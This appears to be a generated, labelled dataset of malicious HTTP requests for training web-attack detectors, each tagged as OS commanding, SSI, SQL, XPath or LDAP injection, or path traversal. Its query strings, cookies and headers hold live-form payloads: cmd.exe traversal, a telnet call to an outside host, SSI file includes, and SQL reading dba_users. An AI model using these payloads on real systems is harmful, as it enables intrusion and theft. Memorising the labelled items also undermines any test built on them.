From: shsepita@58bptbh.fr
If-Modified-Since: Sun, 10 Jan 10 23:29:28 UTC
If-Match: "7Yz8I-FrZZ7Ca0uPe"
If-None-Match: "zdvqD@F5PkUkb87AVA3"
If-Range: *
Max-Forwards: 3204
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic Y3RleDpobnVlaGVm
Authorization: Basic bnJuekV0djp0cjR1TG9hdQ==
Referer: http://www.gptt.fr/8onet/2nIafIr.pdf
TE: gzip;q=0.3
User-Agent: cY.TQmT http://www.hsoafva.fr
UA-Pixels: 654x386
Via: Rs0/2.7 39.133.156.176
Transfer-Encoding: compress
----: ------------------------------------------

null

End - Id: 37442
Start - Id: 43910
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: 176.220.62.86
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.8, deflate, compress, gzip, compress;q=0.8
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 109.23.226.147
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="45"
Date: Fri, 04 Jun 04 04:34:43 CET
ETag: W/"0oIq-QwFP03wjkKWU"
Expect: slnliT
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Tue, 14 Jun 05 24:13:49 CET
If-Unmodified-Since: Sat, 26 Jan 08 06:20:32 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 30 Nov 08 23:25:38 UTC
Max-Forwards: 2527
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: I7d4 pxamohog=uiio
Authorization: jaier uicSij=Hxcaxs
Range: 6652-,-36477,66590-93
Referer: /hedl/yunmeeod/sr1tshi/d6fnri/acsT.sh
TE: trailers,chunked;q=0.3
Trailer: If-Match
User-Agent: et9Vlp9M http://www.lehibeie.be
UA-CPU: StrongARM
UA-Disp: 0478,357,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: HTTP/4.0 50.133.50.36
Transfer-Encoding: compress
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 432 www.i7dte.html "w6tbf" "Sat, 14 Feb 04 01:47:29 UTC"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43910
Start - Id: 39606
class: SSI
GET /ttni/ssyor5tlwlBtxShwbp/sFiyl6/i5noabdnI/xvq_sB9lm/2Ye89jkmoetctw/ikKwrOpTVg1X1.i/gDRA/dHdhV.js?oaDh=sslua&dbi9ensu5E=pAe5ZmqOugAK&APUlOZM.BG9M=ozZOVs_a&f60fentnrainnl=rlsor3&mciudhhtjiyt7dt=%3C%21--+++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E&WEbnaoftncbT=d10_Rms0lqA HTTP/1.0
Host: www.eTKt.fr:85
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.7, iso-8859-2, euc-tw;q=0.7, ks_c_5601-1987, windows-1251;q=0.0
Accept-Encoding: identity;q=0.7, compress
Accept-Language: *
Cache-Control: max-age=334
Client-ip: 239.19.170.214
Cookie: ttyaE4wjf=7145163518;oklike4Mshutdown9w=8;ueaoqQ0seOibemt=eCecQQyDU
Cookie2: $Version="067"
Date: Wed, 17 Aug 05 20:43:06 CET
ETag: W/"5DYXg9DnNO7-9g7IHY"
Expect: nuEdWa
From: k4wcg@aEdi7a2.de
If-Modified-Since: Sat, 23 Dec 06 22:30:44 CET
If-Unmodified-Since: Mon, 10 May 04 07:01:12 GMT
If-Match: *
If-None-Match: "7K6CkfYWjKe4J5vA"
If-Range: *
Max-Forwards: 0481
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic a0k3bm9tOm5yYTg=
Authorization: NTLM aWlzaW5oY3M1cnFuY3ZVbWE0T3R0aWU2b2p0OXRpcmU5aTh3bGFiaWFoZWk=
Range: -96394
Referer: http://www.tVeXR.uk/cothbe/isseSe/xatspTlr/wtfb1s/r8osv.mdb
TE: deflate
Trailer: Warning
User-Agent: Mozilla/9.6 (X11; U; Linux i386 2.6; im-e6; rv:3.6.8) Gecko/40958315
UA-CPU: PowerPC
UA-Disp: 7073,179,8
UA-OS: Win9x
UA-Pixels: 1841x260
Via: HTTP/6.7 www.Scuijn.png, HTTP/4.9 www.oTbhnnn.htm
Transfer-Encoding: lpeitb
Upgrade: blrDl/9.7, eie/1.2, i9hq4/7.4
Warning: 456 21.250.60.163 "ojaOt3inIin" "Sun, 24 Jul 05 04:29:49 CET"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 39606
Start - Id: 43481
class: OsCommanding
GET /0P5fposition58NJE/olQwrMb/jLha/n6dyjV/driesthoc.exe?SGL7Ay0kdelete2=5074&en=sdpcorsrIhtaccesn+qOlDshome%3D7&kzpe=hinC%5DsEtrbRwo&sizfeaabjrge=iloghl1ej3boot.ini&oitnrrhy3=nxxTA%40&uoaa5p2pjtHrmT=615287&clopCXa-wf=%5C%22+%5C%3B++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.chlltr.com++++01%5C%3B&ecahtnnimBpnctt=p%5Cho&yconnect1P@=a6oolnab HTTP/1.0
Host: 82.240.189.170
Connection: msycjaEj
Accept: audio/*;q=0.6
Accept-Charset: iso-8859-5;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=122
Client-ip: 255.41.98.184
Cookie: dncHtoee=84;hf=0947515
Cookie2: $Version="51"
Date: Wed, 26 Jul 06 03:05:40 GMT
ETag: W/"@K4eB7R86idDJqDsd"
Expect: 100-continue
From: 0rhyil@a9lhonata.it
If-Modified-Since: Sat, 19 Aug 06 23:44:19 GMT
If-Unmodified-Since: Fri, 16 Jan 04 23:57:32 CET
If-Match: *
If-None-Match: ".LEOUGsr8Y.wmNOj"
If-Range: *
Max-Forwards: 499
MIME-Version: 2.7
Pragma: h='de'
Proxy-Authorization: Basic dHR3SVJyaWU6ZHJhdGVtOA==
Authorization: snnone tsht4=D3doear
Range: 4-
Referer: http://www.yetme.com/ae0rb.dll
TE: gzip,trailers,chunked;q=0.9
Trailer: Range
User-Agent: Mozilla/0.5 (X11; U; SunOS sun4u 8.7; uc-cs; rv:9.1.2) Gecko/60986014
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2941x889
Via: 7.9 www.3fdsttd.png
Transfer-Encoding: deflate
Upgrade: fnnrrl/9.4, febrea/6.3, qsal/0.4, T0ng5e/2.6
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 43481
Start - Id: 41256
class: SqlInjection
GET /gQq@4httpDECJ/nodenZ7delete3hY/etsoharlAotncnoo/abpasswdoptFStPPT/opYfHCzZR/pMueE4re9ext/ev5u/p0v1sY4dI6vFp524A/kgt/lzwS9sfMqW31j_Dc/tdMj@WqgTkRLHb/jjFigbg39e9ud.asp?sesstAJif=8het2nNw&hsngteC4t4iers=lyn&by=t4tf&JfIZu=Vo4+tg%5B&dtop=3&eePWtgddonnef4m=uTtjvbscript3fl&met=if6VhlL1zk9&lTTIiiEe=46&no7miladnnn=u+gpasswdfNtpseaev7esma&eseote2nxpon1e=usosdtsrOsz&trieaNq8=67016941&.copyBHxsopenz=806 HTTP/1.0
Host: 45.64.209.36
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.7
Accept-Language: N3ul-ljttf;q=0.0, t-grfHar
Cache-Control: max-age=9
Cookie: ti7d6=3;es=765132;tn=310100217;Id2niotesSnhh=hcaot8n;JpSg=saesy-ycolsr
Date: Mon, 12 Apr 10 15:07:21 CET
From: 6aTEudts@aseotsrut.org
If-Modified-Since: Tue, 08 Sep 09 18:18:53 GMT
If-Unmodified-Since: Fri, 25 Aug 06 02:55:19 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 14 May 09 15:46:49 UTC
Max-Forwards: 7
Pragma: no-cache
Authorization: Basic TXR1dDQ6ZWl5cmQ=
Range: 07-514
Referer: /tessemre/og5Bn03I/omsaore.pdf
User-Agent: fpWhri' UNION    /**/   SELECT   hnuzd FROM dba_users    WHERE     xUi    like     '%25
UA-Disp: 195,8034,32
Via: 1.1 177.252.75.219
Transfer-Encoding: identity
Warning: 307 94.129.248.194 "osgitois" 
X-Serial-Number: 37240861433574285269

null

End - Id: 41256
Start - Id: 35857
class: XPathInjection
GET /as8rheqrtnin5ahel5/uJ5K_dTRux/pTstyleqK-/sdubnnulscaeqirs/mXKWT/FQpositionJtIlp@uB/gse9Akhe5q0soItank.shtml?x9GGi=d5aue3f0llitl&Ltaecit=tBeKXKe8pgFF&0r0gs=ueda&tsr5come=hpSa4zbpqs41b-&QFO5gNQt-IY=3vDvBjtl&eaytrjr=rdg+qaempgess&Bsnttn=l1tne+le2%5D&i.idautoexecohQpsaopen=Lntgsw%27+++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+++i++++%2B++j++%2B+k+%2B+l+%2B+1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%27conmg%27%3D+++%27++vonny%27+or&t5hfdagtrngo=bpsree&aorsE=sey2ltmq7e7ltbds&gsgyt4cheheiIia=tQ_c96G&ua7enlvaCcq=dTnoSdAI&a8silahSrsez=hQno2pIuyna&4mytecseteeg=5&gMHselectBGjt=tP0RYO HTTP/1.1
Host: 183.135.108.177:0
Connection: onhaaM
Accept: application/zip;q=0.6, video/*;q=0.1, text/plain;q=0.9
Accept-Charset: windows-1258, macintosh;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.5
Cache-Control: max-age=975
Client-ip: 166.9.40.74
Cookie: gajha6ot=7rt|v;O9y7whQe=3038;htnhpt3i=tTJy7mJ3;dDh7tcssnji=jdDhu242yT;ae5wcscom=as;2HZwhere5divK20=nDLcSC3
Cookie2: $Version="9"
Date: Tue, 15 Apr 08 10:13:52 UTC
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: 100-continue
From: alcSeiee@shniectns.be
If-Modified-Since: Mon, 19 Oct 09 08:26:54 GMT
If-Unmodified-Since: Fri, 21 Dec 07 24:33:04 CET
If-Match: "75ogcdEg1tIwP2ZdWlK7"
If-None-Match: "nunEqVpqx1i.12QckN7"
If-Range: "VvCOAS0NlLKhY8-"
Max-Forwards: 64
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: Basic aXNuZXN1bG86aElpY25PZmk=
Range: -15
Referer: /4Ittdqb/BusOial.mspx
TE: trailers
Trailer: Range
User-Agent: Mozilla/7.3 (Windows; U; WinNT 6.6; on-n8; rv:9.3.7) Gecko/04612443
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4135x5853
Via: FTP/4.0 239.72.167.164:82, HTTP/8.7 www.3asH.css, FTP/7.5 119.223.249.201
Transfer-Encoding: gzip
Upgrade: ei2y/3.0
Warning: 278 124.130.70.150 "dewioT68Dmdytekib4" "Tue, 23 Nov 04 10:02:15 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35857
Start - Id: 44239
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.e7qEstse.uk
Connection: riucuor
Accept: text/html;q=0.4, application/*;q=0.9, video/quicktime
Accept-Charset: cp-932;q=0.3, macintosh;q=0.4, x-mac-icelandic
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.9
Cache-Control: min-fresh=40
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="9"
Date: Thu, 24 Jan 08 07:01:54 UTC
ETag: "-8T0kbq_jilGiD3"
Expect: 100-continue
From: ided@udhoes.uk
If-Modified-Since: Wed, 01 Mar 06 01:04:52 CET
If-Unmodified-Since: Mon, 07 Mar 05 11:34:53 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Apr 10 21:54:56 CET
Max-Forwards: 30
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: tOde nurp1=vlcwt
Range: 347-
Referer: http://www.o4drg.st/2h4su/ey6n9/ciy4eann/gcte.exe
TE: trailers,chunked,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.4 (Windows; U; Win98 2.9; Cn-ht; rv:0.0.3) Gecko/67234259
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: compress
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 60134269598248
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44239
Start - Id: 44770
class: PathTransversal
GET /iW3GaQzJnfjY/dgU33.cv8GaNr1/tr2eaaofeePqidl0/oexedtPa4bamhero.gif?@8dropt0boot.ini.WvV-=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e HTTP/1.1
Host: www.anmhmd0nE.fr
Connection: hdntej
Accept: application/rtf, application/zip;q=0.0
Accept-Charset: koi8;q=0.5
Accept-Encoding: *
Accept-Language: shade-nhajS8, Ite-ram;q=0.2, so-Tcett, ip-ri0dn;q=0.4, u5etct-tanae;q=0.3
Cache-Control: cveots=4rcrturs
Client-ip: 98.197.118.87
Cookie: GEG5xtHYjK=~a(ml'atudi o;NExOexecIo=42441
Cookie2: $Version="576"
Date: Sat, 17 Oct 09 08:09:40 GMT
ETag: W/"jG0mx5PG2xZN@2MUK"
Expect: 100-continue
From: sfn2@eoeOs.net
If-Modified-Since: Sun, 25 Dec 05 23:23:35 UTC
If-Unmodified-Since: Sun, 21 May 06 03:47:30 CET
If-Match: *
If-None-Match: "_Y2dn76.w9B@DcvR"
If-Range: Wed, 23 Jul 08 11:47:37 CET
Max-Forwards: 622
MIME-Version: 1.4
Pragma: tiqhp9s='rt3Tise'
Proxy-Authorization: Digest realm
Authorization: Basic TGNhdHV0YzpEZWFyb2I0
Range: 6578-336232,-258470,45228-5909
Referer: http://fOeitE.org/ab0i.pl
TE: trailers,deflate
Trailer: Warning
User-Agent: heuohjAHseledaqtiro
UA-CPU: Sparc
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: 7.1 www.hneoy.tiff
Transfer-Encoding: compress
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44770
Start - Id: 40970
class: SqlInjection
GET /XVavF-mL/qmmqd4iqig5aeea/ieTbnyiaoomk/t.qLjbNv8WV1x97-@/eBpurYmgy8Oen/oeaotwosHgaTHfmOiOdr/bsgduoaoent/sHlcCZNGrs/nlqAV692KF/yotioeor2/tVLuWijwSBApP/hHjI.shtml? HTTP/1.0
Host: 199.63.88.158
Connection: EqtRtod
Accept: audio/*, image/*;q=0.8, video/quicktime;q=0.0
Accept-Charset: windows-1252;q=0.6, koi8, x-mac-arabic;q=0.6, us-ascii
Accept-Encoding: bulk insert  lemmnem   from 'pwdump.exe'        with     (codepage='RAW'  )
Accept-Language: qdnu9-bedste, oteRt-dsosnal;q=0.6, smotT-pOogo, nptiof-a, g-i;q=0.7
Cache-Control: min-fresh=1460
Cookie2: $Version="34"
Date: Fri, 22 Jan 10 02:47:17 CET
ETag: "Kf@7..91LZ5JErV-"
From: iatou@Ch6a6Eat.ch
If-Modified-Since: Wed, 16 Nov 05 12:58:56 CET
If-Match: *
Max-Forwards: 3
Pragma: Wstatc='uset'
Referer: /nsr0s1td/ePmm/eshizzua.php
User-Agent: w4ae6e/4.7.6
Via: 8.0 www.jmwsAh.html, HTTP/1.4 15.245.55.89
Warning: 891 www.Dgnneo.png "tgConortovhrr" 

null

End - Id: 40970
Start - Id: 40874
class: SSI
GET /tfM12b.38lIOSy/c8cesett/me2hi/pdsWNx/iosghc3Bk5t/f3gxC9ZJ586KaiGmlnj/pdghae2wdpaaexz/qWXmYE8@PP8uSURHuOFI/Heunslafbh8i.swf?kjgrdnnid3pay1m=onx&itrsmpldnia=%3C%21--++++%23odbc+++++statement+++%3D%22select++gk1edje%2C++++on%2C++oyralN0++++from+++ehmsld++order++++by+0%2C++50%2C+1%22+++--%3E HTTP/1.0
Host: www.wv8emn8zu.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.7
Accept-Language: *
Cache-Control: min-fresh=35935
Client-ip: 13.72.58.206
Cookie: eouXquttegai=aeoO;aQaiexu=6110;i6ruj7eocIhn=otmpw0eaT;l2jotu=219109
Cookie2: $Version="63"
Date: Thu, 26 Feb 04 23:12:47 UTC
ETag: "KbUataLGPHm7kibu58"
Expect: 1ftgarh=esSyfe
From: xhslhnd@1eneubz.it
If-Modified-Since: Sat, 17 Mar 07 08:04:25 UTC
If-Unmodified-Since: Tue, 02 Jun 09 08:01:30 UTC
If-Match: "FT6m8BxwR2o8CgxLkBIg"
If-None-Match: "U8A2Imsd7wd2@Ey"
If-Range: *
Max-Forwards: 94
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM NGJvb3RUZVVjZ3R0c05tcmVzY29zNmI3a2xpUnBvcjVubGh4c2Z4
Range: -375,-4
Referer: /astoaome/aLe2hnoA/elhf3d.msf
TE: chunked;q=0.0,trailers,chunked
Trailer: Upgrade
User-Agent: Mozilla/2.5 (Windows; U; Win98 4.4; ar-ns; rv:6.3.9) Gecko/51330637
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/6.8 www.vietfyP.html, HTTP/1.6 www.Itn1role.png
Transfer-Encoding: onHp; nHtsod=ceaii
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 64687084042208
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40874
Start - Id: 40896
class: SSI
GET /sXC19AwKqo21VE6/trEN644qv_yRQHT_NFv-/cy3MCy9dbqp5/wia5nf1y8wdr71r0qro/tiy4g64NNsRP3P/nhwor/4JwJq.S.msf?urkLpk=esnin%25u&enroeasrDenon=sNBt&sluel94iioete=dbA7wCV&fhdclaeurD35oz0=284574&rffoNeDn2u6qUTI=99138&bw0pz1enroeWs=e&pIimztztrun=exec%7C4&egsresTnHqdr=fYroaivas&ielsohsDdixcah=s7g%40eKNJiIR&eOx=65329262&https8likej6_b=%3C%21--++%23odbc++++connect%3D%22aenhis%2Ced2%2Cwsk%22++++++statement%3D%22select++*+++++from++++eF%22--%3E HTTP/1.1
Host: www.lelliIi.de
Connection: close
Accept: audio/*;q=0.0, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 180.221.196.37
Cookie: ohK5dO=ptaaO>;Da8ob=oe$ 1gEz9nAAy
Cookie2: $Version="350"
Date: Mon, 29 Dec 08 24:35:07 CET
ETag: "PJL9B8l1.1S_wd_"
Expect: 100-continue
From: 2cEq@o7ggnio.cz
If-Modified-Since: Fri, 07 Aug 09 04:00:05 GMT
If-Unmodified-Since: Tue, 10 Jan 06 14:03:10 UTC
If-Match: "6BLVnQdT-ikd96ol6s"
If-None-Match: *
If-Range: Sat, 09 Aug 08 11:36:45 CET
Max-Forwards: 296
MIME-Version: 4.6
Pragma: sb=s
Proxy-Authorization: NTLM b3Bpc295VHpvc2syNGxlZkV3aGlhbmVuZTVlYmh0b3RzenI=
Authorization: atU2Eo WrSxS=eOald
Range: 776-,-33080
Referer: http://Gma6ui.it/tMhseqs/yaDpt/lReaner.aspx
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.2 (X11; U; Linux i586 9.6; It-hg; rv:1.4.3) Gecko/93519843
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/6.6 100.7.237.22:880
Transfer-Encoding: identity
Upgrade: fmoaA/7.1, wyse3a/5.5, tlee/2.8, eejrdw/0.2
Warning: 603 www.e2tt.jpg:323 "reecdaeesselriRoe" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 821981271525659
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40896
Start - Id: 49919
class: XPathInjection
GET /3zds--7eGocSOc5xc15/estSiiA3ehyeiu0mcht/eOQkvwRFcd-ns1stt/5shutdownILP92rIbXZk/hKTWZ_7ROX6-mOktX/l_9cd/Z_kC9jFF0iO6@C.tiff?tsmid8o=r&dliono=5129260427&Lrea1n7twr=en4hbss%3Dolinkd9nwindow.openShtpass4+ee&fodsqfinba309i=neOp2e4srLT&ETSIY_replaceMCHKZ=6904298&eddcrbesdua=0rtbaetnlneh&oatEeassmd2i=%3EstnnaB+&nwtgaaaretaagxa=nosx%27+++or+count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28i++++%2B++++j++++%2B++++k%2B+++l+++%2B++1%29%5D+%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++%27ccdPsa%27+%3D+++%27++++aedbusin%27+++++or&rzob=4 HTTP/1.0
Host: www.T3osfaou.biz
Connection: close
Accept: */*;q=0.9
Accept-Charset: us-ascii;q=0.7, cp-932
Accept-Encoding: deflate, compress;q=0.1, deflate;q=0.2, deflate;q=0.7
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 71.34.148.218
Cookie: seoeanHquean=18714
Cookie2: $Version="455"
Date: Fri, 05 May 06 13:47:25 GMT
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: rmxetsnS@eaotitdn.com
If-Modified-Since: Sun, 31 Oct 04 22:31:48 UTC
If-Unmodified-Since: Sun, 26 Jul 09 14:35:29 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 22:25:22 GMT
Max-Forwards: 72
MIME-Version: 8.6
Pragma: eg='o3uEee'
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: 2ahlAk eisydtns=lNj3t
Range: -983
Referer: /dawpp/eleethfd.tar
TE: trailers,deflate,trailers
Trailer: Host
User-Agent: tslrabiDer/1.4.1.9.1
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: FTP/9.4 31.29.229.96:0
Transfer-Encoding: compress
Upgrade: qfe/8.0
Warning: 682 www.f0shh3eu.jpeg "tocdihgtUi" "Fri, 20 Feb 04 11:54:19 CET"
X-Forwarded-For: 174.202.38.181
X-Serial-Number: 2013029504
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49919
Start - Id: 40378
class: SSI
GET /onr4pfi9eTeynlecdnjd/dzinreaehlhnis.aspx?oeoeT=220&sxeH=dopt4restN%24%3Ed3h&ee0I=rseyht6a8e&sdtaqtraimCcan=55797321&fFusnkterm=879&vjKl4MJU=1979&7fl=seeIne&vaTi=943561&ucsbfEdtoemyt7t=0&nldJY-Sdrop2pLe=893280&haOMeatwpsenS=%40h&bininputCFhHU=4 HTTP/1.1
Host: www.sihqa2.st
Connection: close
Accept: */*
Accept-Charset: iso-8859-7, x-mac-arabic;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 54.76.160.189
Cookie: N2dcmdg=hvrzVvwodf;ancotilnn=mv4;b9kherQt2leiwnE=ms5;su3eegqde=<!--   #include  virtual="c:\winnt\system.ini"-->;wen7gdciaajg=ttmpenautoexecseesz
Cookie2: $Version="768"
Date: Fri, 04 May 07 04:51:48 UTC
ETag: W/"xyIsed0-ThebP@CVpgwT"
Expect: 100-continue
From: erho3el@igce.fr
If-Modified-Since: Wed, 18 May 05 19:10:09 CET
If-Unmodified-Since: Fri, 27 May 05 24:13:09 UTC
If-Match: "WnVG9233j.KZJu.Bny"
If-None-Match: "_xmCQf.FRk0y-IFyRKo"
If-Range: Mon, 09 Jan 06 04:16:48 GMT
Max-Forwards: 2093
Pragma: o='AleoTkcn'
Proxy-Authorization: Digest nc=Afc3Cf12
Authorization: NTLM NGtpamRnbmZheTZhbnJoa3R5d2xpNnJrdXNhc3N1eG1yZXJsdmU5amxudmVsRQ==
Range: 96-,55-506,03-
Referer: http://nntManh.it/rUlFahn/caeAu/nqEaiaeh/nusTOeed/tesosYte.css
TE: gzip
Trailer: Date
User-Agent: Mozilla/2.7 (X11; U; Open BSD i386 1.7; td-ns; rv:3.8.4) Gecko/73808731
UA-Disp: 1230,8979,32
UA-Color: color8
UA-Pixels: 1566x5651
Via: FTP/7.7 130.83.72.121
Transfer-Encoding: cule
Warning: 423 www.nli4.png "or0brioddA" "Wed, 28 Mar 07 16:13:54 GMT"
X-Forwarded-For: 167.91.249.90

null

End - Id: 40378
Start - Id: 40872
class: SSI
GET /jSY_child19Hg/tenEeh7ti9/ndslqgtonz0uvwe/eaahzgeNi.gif?nrdtlIorpw8=ht4to1N%7Cm%3Eas%27eetctse&reaiq6jt9tso6=havh+nm&tznrl0hpf0Hlj=s%40+%29&t7eo0zsh=eg%24lreplaceNIperl%7Cnszxny9scD8&sahtrovStretdn=hs7t&aeaeitoo0eH=14-&bvgauon2zpDOkes=12&G25KJ9G=%3C%21--%23odbc+++connect%3D%227e%2C4s%2Ceokf%22++++++++statement%3D%22select++++*++from++++g6no%22--%3E HTTP/1.0
Host: 206.178.72.46
Connection: keep-alive
Accept: application/x-tar, image/jpeg
Accept-Charset: iso-8859-5, x-mac-chinesetrad;q=0.4, euc-kr, x-mac-hebrew;q=0.7
Accept-Encoding: *
Accept-Language: er-tc082soo;q=0.5
Cache-Control: max-stale=1
Client-ip: 13.72.58.206
Cookie: eouXquttegai=aeoO;aQaiexu=6110;i6ruj7eocIhn=otmpw0eaT;l2jotu=219109
Cookie2: $Version="63"
Date: Fri, 28 Nov 08 20:54:22 UTC
ETag: "KbUataLGPHm7kibu58"
Expect: 1ftgarh=esSyfe
From: xhslhnd@1eneubz.it
If-Modified-Since: Tue, 03 Feb 09 07:13:55 GMT
If-Unmodified-Since: Wed, 28 Nov 07 11:07:44 CET
If-Match: "psWLBJ_nw8ZU0IKi"
If-None-Match: "U8A2Imsd7wd2@Ey"
If-Range: *
Max-Forwards: 94
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM c2Fvd3JwZGZjc2J4SXNzZGF4MWhyM2J0blR0cGRpOWV6eA==
Range: -375,-4
Referer: http://ihia7s.net/save/6aaocy.ace
TE: chunked;q=0.0,trailers,chunked
Trailer: Upgrade
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 3.2; wo-nA; rv:0.4.2) Gecko/87074748
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/6.8 www.vietfyP.html, HTTP/1.6 www.Itn1role.png
Transfer-Encoding: onHp; nHtsod=ceaii
Upgrade: etis/5.5, ane/3.5
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40872
Start - Id: 37241
class: LdapInjection
GET /a8odeothdIhnlao/LUs8ARWsystemyLa85ej/K-UCGFiyVMprocessing-instructionT/nAAtNjWflow9HDOBV/sdoKsrd0VvzZ/jeP@k8irBiQO7.swf?otahiaskUVl=88932872&5eST=gdt4&hwpstx9aeotUxe=%7Cm%27t&faEpccl=059&h3oo8b9a=0893079&reTdeeuz2=ulceh%29%28%26%28objectClass+++%3Dnt*%29&bnS=trc%7Ea&seo4=t&fitomOsalnd=cesun%3D&so6ezi6te=8946&ytzag2nglr=%26e+rt%25rlho9-9t&un9sgr5ibwTetx=eW0&3f=8+nom4s HTTP/1.0
Host: www.iyodtn.de:80
Connection: close
Accept: audio/x-wav, image/*;q=0.3
Accept-Charset: cp-950, iso-8859-8-i;q=0.7, cp-932;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 206.100.255.13
